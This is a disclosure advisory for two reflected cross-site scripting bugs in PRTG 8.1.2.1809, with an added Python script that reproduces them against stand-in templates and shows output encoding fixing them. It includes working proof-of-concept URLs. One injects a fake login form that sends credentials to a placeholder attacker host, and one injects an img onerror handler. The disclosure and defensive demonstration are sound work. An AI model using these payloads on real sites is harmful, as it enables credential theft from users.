PRTG version 8.1.2.1809 suffers from reflective cross site scripting vulnerabilities.
XSS (Reflected) Bugs in login.htm and error.htm
================================================================
PRTG V8.1.2.1809 (All OS Versions):
http://www.paessler.com/
I have discovered two reflected XSS bugs within PRTG version 8.1.2.1809. These bugs
are in the login.htm and error.htm documents.
These issues were possible because of a lack of input checking of the errormsg GET
parameter within login.htm and the errormsg and errorurl GET parameters within
error.htm. Output encoding routines were also not consistently used throughout the
application. In login.htm the injected markup closes the page's own div and form and
appends a second login form whose action points at an attacker-controlled host, so
credentials typed into the page are sent there; in error.htm the payload breaks out of
an attribute value with "> and adds an img element with an onerror handler.
PoC:
https://localhost/public/login.htm?loginurl=%2Fpublic%2F&errormsg=%3C/div%3E%3C/form%3E%3Ctable%3E%3Cform%20action=%22http://attacker.host/steal.php%22%20method=%22GET%22%3E%3Ctr%3E%3Ctd%3ELogin%20Name:%3C/td%3E%3Ctd%3E%3Cinput%20class=%22text%22%20id=%22loginusername%22%20name=%22username%22%20type=%22text%22%20value=%22%22%20%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput%20class=%22text%22%20%20id=%22loginpassword%22%20name=%22password%22%20type=%22password%22%20value=%22%22%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Ctd%3E%3Cinput%20id=%22submitter%22%20class=%22submit%22%20type=%22submit%22%20value=%22Login%22%3E%3C/td%3E%3C/tr%3E%3C/form%3E%3C/table%3E%3Ciframe%20width=0%20height=0%20src=%22&loginurl=%2Fhome
https://localhost/error.htm?errormsg=%22%3E%3Cimg%20src=%22kaasdfasdf%22%20onerror=%22javascript:alert%28/test/%29%22/%3E&errorurl=%22%3E%3Cimg%20src=%22kaasdfasdf%22%20onerror=%22javascript:alert%28/test/%29%22/%3E
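As an added example (not code from the advisory and not PRTG's own code), the Python script below reproduces both bugs against hypothetical stand-in templates for error.htm and login.htm. It percent-decodes the PoC query strings the way the server does, renders the parameters once with no output encoding and once through html.escape(quote=True), and runs the result through the standard-library HTML parser to list the tags, on* event handlers and form actions a browser would see. The template markup, the /public/checklogin.htm form action and the audit helper are assumptions; the payloads are the advisory's (the login.htm one trimmed to the breakout and the injected form tag).

```python
"""Reproduce the PRTG error.htm / login.htm reflected XSS against stand-in templates.

Added example, not PRTG code: the templates are hypothetical, the payloads are the
advisory's PoC URLs (the login.htm payload trimmed to its leading tags).
"""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# ERROR_POC is the advisory's error.htm URL verbatim. LOGIN_POC keeps only the part of
# the errormsg payload that closes the page's div/form and opens the attacker's form.
ERROR_POC = (
    "https://localhost/error.htm?errormsg=%22%3E%3Cimg%20src=%22kaasdfasdf%22%20onerror="
    "%22javascript:alert%28/test/%29%22/%3E&errorurl=%22%3E%3Cimg%20src=%22kaasdfasdf%22"
    "%20onerror=%22javascript:alert%28/test/%29%22/%3E"
)
LOGIN_POC = (
    "https://localhost/public/login.htm?loginurl=%2Fpublic%2F&errormsg=%3C/div%3E%3C/form%3E"
    "%3Ctable%3E%3Cform%20action=%22http://attacker.host/steal.php%22%20method=%22GET%22%3E"
)

# Hypothetical stand-ins for the PRTG pages: only the reflection points matter.
# errormsg lands in element text, errorurl in an attribute value.
ERROR_TEMPLATE = ('<div class="error">{errormsg}</div>\n'
                  '<a href="{errorurl}">Back</a>')
# The form action is an assumed value, not PRTG's real login handler.
LOGIN_TEMPLATE = ('<form action="/public/checklogin.htm" method="post">\n'
                  '<div class="error">{errormsg}</div>\n'
                  '<input name="username"><input name="password" type="password">\n'
                  '</form>')


def get_params(url):
    """Percent-decode the query string as the server sees it (first value per key)."""
    query = urlsplit(url).query
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def render_vulnerable(template, params):
    """No output encoding at all: the defect the advisory describes."""
    return template.format(**params)


def render_fixed(template, params):
    """HTML-encode every reflected value. quote=True matters: the error.htm payload opens
    with "> to leave the href attribute, and html.escape() without it keeps the quote."""
    return template.format(**{k: html.escape(v, quote=True) for k, v in params.items()})


class MarkupAudit(HTMLParser):
    """Record what a browser would tokenise: every tag, on* handler and form action."""

    def __init__(self):
        super().__init__()
        self.tags, self.handlers, self.form_actions = [], [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [name for name, _ in attrs if name.startswith("on")]
        if tag == "form":
            self.form_actions += [value for name, value in attrs if name == "action"]


def audit(rendered):
    """Parse rendered HTML and summarise the markup the reflected values introduced."""
    parser = MarkupAudit()
    parser.feed(rendered)
    parser.close()
    return {"tags": parser.tags, "handlers": parser.handlers,
            "form_actions": parser.form_actions}


def reproduce(poc_url, template):
    """Return (audit of vulnerable rendering, audit of fixed rendering) for one PoC."""
    params = get_params(poc_url)
    return audit(render_vulnerable(template, params)), audit(render_fixed(template, params))


if __name__ == "__main__":
    for page, url, template in (("error.htm", ERROR_POC, ERROR_TEMPLATE),
                                ("login.htm", LOGIN_POC, LOGIN_TEMPLATE)):
        vulnerable, fixed = reproduce(url, template)
        print(page, "vulnerable:", vulnerable)
        print(page, "fixed:     ", fixed)
```

With the vulnerable rendering the error.htm audit shows two img tags and two onerror handlers (one from each parameter), and the login.htm audit shows a second form whose action is http://attacker.host/steal.php; after encoding, only the template's own tags and its single form action remain. Encoding has to match the output context: the same html.escape(quote=True) covers element text and double-quoted attribute values here, but a value reflected into a URL, a script block or an unquoted attribute would need its own encoder.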
The vendor was very responsive and has fixed these issues in version
8.2.0.1898/189 released on January 17th 2011.
--
Thanks,
Joshua Gimer
---------------------------
http://www.linkedin.com/in/jgimer
http://twitter.com/jgimer